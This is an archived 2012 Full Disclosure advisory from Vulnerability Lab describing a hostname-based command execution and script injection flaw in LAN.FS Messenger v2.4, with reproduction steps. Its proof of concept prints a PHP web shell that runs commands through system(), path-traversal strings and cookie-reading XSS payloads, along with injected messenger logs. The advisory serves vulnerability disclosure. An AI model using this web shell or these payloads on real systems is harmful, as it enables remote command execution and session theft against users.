Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

LAN.FS Messenger Software v2.4 - Command Execution Vulnerability
From: Vulnerability Lab <research () vulnerability-lab com>
Date: Tue, 20 Nov 2012 04:13:30 +0100

Title:
======
LAN.FS Messenger v2.4 - Command Execution Vulnerability


Date:
=====
2012-11-14


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=760


VL-ID:
=====
760


Common Vulnerability Scoring System:
====================================
8.2


Introduction:
=============
Lan.FS is a very quick, small and compact freeware networktool (for non-commercial use only) for 
Windows 2000/XP/2003/Vista & Windows 7. It is easy to handle for beginners and provides various 
functions for experts, too. Some features are:

    Messenger with animated emoticons
    Filetransfer service with statusdisplay
    Remote Desktop functions to telecommand other computers in your network
    Remote Shell function for access to the systemprompt of other computers in your network.
    Access to the whole filesystem of other computers
    Windows commands (reboot, shutdown, user switch, run) on other computers

These functions are provided in your Local Area Network. Innovative aspects concerning networkprograms are:

    Lan.FS is ready for operation directly after finishing installation.
    You do not need specialised knowledge about networks and networkadministration
    Lan.FS does not feature needless functions: You decide what to do.
    Lan.FS works Windows-Workinggroups independent
    Lan.FS works in WLAN networks (even if they are not absolutely stable)
    Lan.FS provides a substantial support and trouble shooting
    Lan.FS is Vista capable

(Copy of the Vendor Homepage: http://www.lan-fs.de/ )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a command execution vulnerability in the official LAN.FS v2.4 
Messenger Software.


Report-Timeline:
================
2012-11-12:     Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
A command execution vulnerability is detected in the official LAN.FS v2.4 Messenger Software. The vulnerability allows 
an remote attacker 
without user inter action to execute own system specific codes to compromise the connected client system in the lan. 
The command execution 
vulnerability is located in the Netzwerkeinstellungen - Administration (Computer editieren, add & co.) > 
Computersettings (Computereinstellungen) 
module with the bound vulnerability Computername software input field. Remote attackers can change the own computername 
to execute malicious system 
commands or script code attacks against the connected client via Messenger Service (Nachrichtendienst). The windows 
path system commands/request or 
the malicious injected script code will be directly executed out of the Nachrichtendienst web context. Successful 
exploitation of the vulnerability 
results in system compromise via command injection/execution, persistent script code injections, persistent software 
context manipulation, external 
malware loads or malicious external redirects. Exploitation of the vulnerability requires a connected conversation but 
no direct user inter action. 
The commands or script code will be executed when the message is processing to arrive.

Vulnerable Software Section(s):
                                        [+] Local Area Network - Computer Details

Vulnerable Software Module(s):
                                        [+] Computtersettings

Vulnerable Software Parameter(s):
                                        [+] Computername

Affected Software Module(s):
                                        [+] Nachrichtendienst (Messenger Service)


Proof of Concept:
=================
The software validation vulnerability can be exploited by remote attacker without required user inter action or 
application user account.
For demonstration or reproduce ...


PoC: Command Execution or Injection (Path, Files & CMD)
%20../'+C:\ProgramData\Lan.FS\
%20../'+C:\ProgramData\Lan.FS\Profile\
%20../'+C:\Program Files (x86)\Lan.FS

<HTML><BODY>
<FORM METHOD="GET" NAME="Message" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>


Review: Command Execution - Messenger (Windows7) Logs
<html><body style="background-image:url(%20../'+C:\ProgramData\Lan.FS\Profile\);
<html><body style="background-image:url(%20../'+C:\ProgramData\Lan.FS\Profile\);
<html><body style="background-image:url(%20../'+C:\Program Files (x86)\Lan.FS);



PoC: Script Code Inject
“<iframe src=http://vuln-lab.com>>
"><iframe src=vuln-lab.com onload=alert("VL") <>
"<script>alert(document.cookie)</script><div style="1


Review: Script Code Inject - Messenger (Windows7) Logs

<html><body 
style="background-image:url(C:\ProgramData\Lan.FS\Profile\Emoticons\background.bmp);background-repeat:no-repeat; 
background-attachment:fixed;  background-position:bottom right;"></body></html><div style="font-family: Verdana; 
font-size: 10px; 
color: #0000ff"><b>>“<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!]> (20:35:38):</b></div><div 
style="font-family: Verdana; 
font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: Verdana; font-size: 10px; 
color: #ff0000"><b>>“<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!]> (20:35:46):</b></div><div 
style="font-family: 
Verdana; font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: 
Verdana; font-size: 10px; color: #0000ff"><b>>"<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!]><div 
style="1 
"<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!])</script>
<div style="1 (20:36:27):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: 
Verdana; font-size: 10px; color: #ff0000"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script>
<div style="1 (20:36:29):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: 
Verdana; font-size: 10px; color: #0000ff"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script>
<div style="1 (20:36:33):</b></div><div style="font-family: Verdana; font-size: 10px; color: 
#000000">>"<script>alert(document.cookie)</script>
<div style="1<br></div><div style="font-family: Verdana; font-size: 10px; color: 
#ff0000"><b>>"<script>alert(document.cookie)
</script><div style="1 >"<script>alert(document.cookie)</script><div style="1 (20:36:34):</b></div><div 
style="font-family: Verdana; font-size: 
10px; color: #000000">>"<script>alert(document.cookie)</script><div style="1<br></div><div style="font-family: Verdana; 
font-size: 10px; color: #0000ff"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script><div style="1 
(20:36:41):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">yea<br></div><div 
style="font-family: Verdana; font-size: 
10px; color: #ff0000"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script>
<div style="1 (20:36:42):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">yea<br></div><div 
style="font-family: 
Verdana; font-size: 10px; color: #0000ff"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script>
<div style="1 
(20:36:49):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">tha boss :D<br></div>
<div style="font-family: Verdana; font-size: 10px; color: #ff0000"><b>>"<script>alert(document.cookie)</script><div 
style="1
"<script>alert(document.cookie)</script><div style="1 (20:36:50):</b></div><div style="font-family: Verdana; 
font-size: 10px; 
color: #000000">tha boss :D<br></div>


Manually reproduce ... 
1. Install the Software LAN.FS 2.4.x and start LAN.FS 2.4.x
2. First we go to Systemsettings in our windows7 system and change our computername/hostname to malicious system path 
command or malicious script code. Save!
3. Change the hostname in Netzwerkeinstellungen> Administration> Computersettings to the own values with the system 
path command or script code (<2.). Save!
4. Update Settings & connect the Nachrichtendient to your target system
5. Send a random message to the victim via lan.fs messenger
6. The vulnerable hostname in the message header can execute local file requests, execute files and path commands or 
execute persistent malicious script codes
7. The command or script code will be executed when the messager is processing to display the arrived message of the 
attacker. No user inter action required!


Solution:
=========
The vulnerability can be patched by parsing the hostname (computername) input field. 
To parse also the hostname web context in the messenger software listing.


Risk:
=====
The security risk of the remote command execution vulnerability is estimated as high(+).


Credits:
========
Vulnerability Laboratory [Research Team]  - Benjamin Kunz Mejri (bkm () vulnerability-lab com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all 
warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss 
of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such 
damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack 
into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - 
www.vulnerability-lab.com/register
Contact:    admin () vulnerability-lab com      - support () vulnerability-lab com             - research () 
vulnerability-lab com
Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com                  - 
news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the 
use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, 
videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, 
list (feed), 
modify, use or edit our material contact (admin () vulnerability-lab com or support () vulnerability-lab com) to get a 
permission.

                                        Copyright © 2012 | Vulnerability Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research () vulnerability-lab com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • LAN.FS Messenger Software v2.4 - Command Execution Vulnerability Vulnerability Lab (Nov 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]